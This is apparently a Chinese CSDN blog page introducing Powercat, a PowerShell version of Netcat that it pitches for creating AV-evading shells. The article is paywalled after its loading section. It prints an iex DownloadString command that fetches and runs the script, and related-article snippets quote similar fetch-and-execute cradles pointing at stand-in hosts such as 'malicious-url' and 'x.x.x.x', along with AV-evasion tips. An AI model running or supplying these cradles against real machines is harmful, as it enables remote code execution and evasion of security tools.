Powershell工具Powercat（可以理解为免杀nc）

墨痕诉清风

已于 2023-04-15 23:03:03 修改

阅读量1k

点赞数

分类专栏：渗透工具 Windows域控文章标签：服务器网络运维

于 2023-04-15 23:02:53 首次发布

本文链接：https://blog.csdn.net/u012206617/article/details/130176747

版权

渗透工具同时被 2 个专栏收录

200 篇文章 ¥19.90 ¥99.00

订阅专栏

Windows域控

54 篇文章 ¥29.90 ¥99.00

订阅专栏

Powercat是PowerShell实现的Netcat工具，适用于文件传输和创建免杀shell。它允许在线下载、文件传输、监听和绑定shell，并能生成独立的有效载荷以绕过IDS检测。本文介绍了Powercat的加载、使用方法，包括如何进行文件传输和建立shell连接。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

介绍

Powercat实质上是由besimorhino编写的Netcat的PowerShell版本我们可以将这个脚本下载到Windows主机上，以利用PowerShell的优势并简化绑定/反向shell的创建。

使用方法

加载

PS C:\Users\Offsec> . .\powercat.ps1

在线下载

如果目标机器连接到Internet，我们可以再次使用方便的iex cmdlet对远程脚本进行同样的操作，如下所示:

PS C:\Users\Offsec> iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Powercat文件传输<

了解本专栏

订阅专栏解锁全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

墨痕诉清风

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树（AST）提取

杨秀璋的专栏

03-11

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树（AST）提取。希望这篇文章对您有帮助，也推荐大家去阅读论文，且看且珍惜。

[ 隧道技术 ] 反弹shell的集中常见方式（一）nc反弹shell

qq_51577576的博客

08-03

2174

攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问，这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机，但是靶机 192.168.3.29 可以访问攻击者的机器，这个时候使用反向shell。...

参与评论您还未登录，请先登录后发表或查看评论

nc超强免杀版 nc免杀版 NC汉化版

07-11

过了该过的杀软！够强！过了该过的杀软！够强！过了该过的杀软！够强！过了该过的杀软！够强！过了该过的杀软！够强！

Powershell免杀

mingyqf的博客

05-11

2583

Powershell免杀本文作者：Chenw 本文链接：https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言前几天搞一个站的时候，进入内网，想让内网一台机子powershell上线。然后被杀软拦截了，极其的不讲武德，想着找我极强的朋友们白嫖个免杀的方法。后面还是没有白嫖到，只好自己去研究学习一下了（针对CS的进行免杀，后面思想大同小异）于是做了这个小笔记。 0x02 Powershell免杀思路先介绍一下powershell木马最常用的方式

【免杀】powershell

zhangshuaiijie的博客

06-24

320

下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation。进入Invoke-Obfuscation目录，在powershell中执行。我看了好几篇去年的文章还是能过的，不过现在火狐和360都不能过去。不过在virscan和VirusTotal上面报毒还是很少的。如果报错，在管理员权限下powershell执行。

Windows版的nc？PowerCat使用指南

最新发布

vortex5的博客

12-26

1003

PowerCat是一款完全基于 PowerShell 的网络工具，被称为 Powershell 版的 nc，专为渗透测试设计。

PowerCat 介绍

f_carey的博客

10-17

1173

郑重声明：本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。 PowerCat 介绍1 PowerCat 基础2 实验环境3 利用 NC 正向连接 PowerCat4 利用 NC 反向连接 PowerCat5 利用 PowerCat 返回 PowerShell6 利用 PowerCat 生成 Payload6.1 正向 Payload6.2 反向 Payload7 利用.

免杀-PowerShell

weixin_58782362的博客

11-20

875

win自带defender杀毒工具，所以defender和powershell用的同一种语言，很容易被查杀，所以我们尽量就不要用powershell。如果是powershell脚本，只要对方执行就能上线，如果是cmd，先输入powershell，然后payload.ps1。2、执行模式-直接执行命令（有上线代码），最好别在powershell终端执行，容易出错。1、直接在base64编码上添加，然后将垃圾数据替换为空，最后进行解码。混淆、手工混淆，将内容进行base64编码，然后进行解码。

nc军刀个人经过处理的免杀版，防止杀软误报。

10-22

个人经过处理的免杀版，防止杀软误报。它本身不是病毒，偏偏有些厂商。。

利用powershell进行免杀

PortugalCR7的博客

06-29

268

利用Invoke Obfuscation进行混淆。查看powershell的版本号（）

我的powershell免杀之路

mingyqf的博客

05-17

2037

我的powershell免杀之路原创 tubai

powershell免杀详解

m0_57836225的博客

08-20

1190

也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`，通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释：PowerShell 模块是一种组织和封装 PowerShell 代码的方式，`.psm1`文件包含函数、变量、别名等，可以将一组相关的功能打包在一起，以便在多个脚本中重复使用，提高代码的可维护性和可重用性。

powershell分离免杀

m0_57836225的博客

08-14

895

(new-object net.webclient).downloadstring('http://x.x.x.x/a')` ：创建一个 `Net.WebClient` 对象，然后使用 `DownloadString` 方法从指定的 `http://x.x.x.x/a` 网址下载字符串内容，并通过 `IEX` 立即执行该下载的字符串内容。1. 信息窃取 - 一旦恶意的 PowerShell 脚本在系统中执行，它可以窃取敏感信息，如用户的登录凭证、文件内容等，并将这些信息发送给攻击者。

PowerShell命令免杀思路

qq_44657899的博客

11-08

1733

文章目录前言大小写管道符修改函数名命令拆分反引号处理低版本powershell使用Out-EncryptedScript加密免杀base64免杀组合拳前言 UNIX 系统一直有着功能强大的壳程序（shell），Windows PowerShell 的诞生就是要提供功能相当于 UNIX 系统的命令行壳程序（例如：sh、bash 或 csh），同时也内置脚本语言以及辅助脚本程序的工具，使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 powershell 具有在硬盘中易绕过，内存中

Powercat：强大的 PowerShell 版 Netcat 工具

gitblog_00040的博客

05-12

609

Powercat：强大的 PowerShell 版 Netcat 工具 powercatnetshell features all in version 2 powershell项目地址:https://gitcode.com/gh_mirrors/po/powercat 项目介绍 Powercat 是一个功能齐全的 PowerShell 实现版的 Netcat。它允许你在 PowerShell...

推荐一款功能强大的网络工具：PowerCat

gitblog_00035的博客

08-09

280

Powershell Plus实用工具包深度解析

标题中的“powershell puls”可能是一个误写，实际上应为“PowerShell Plus”，这是一个第三方的扩展工具，它为PowerShell提供了额外的功能，使得PowerShell在使用上更为方便和高效。PowerShell Plus是一个集成开发...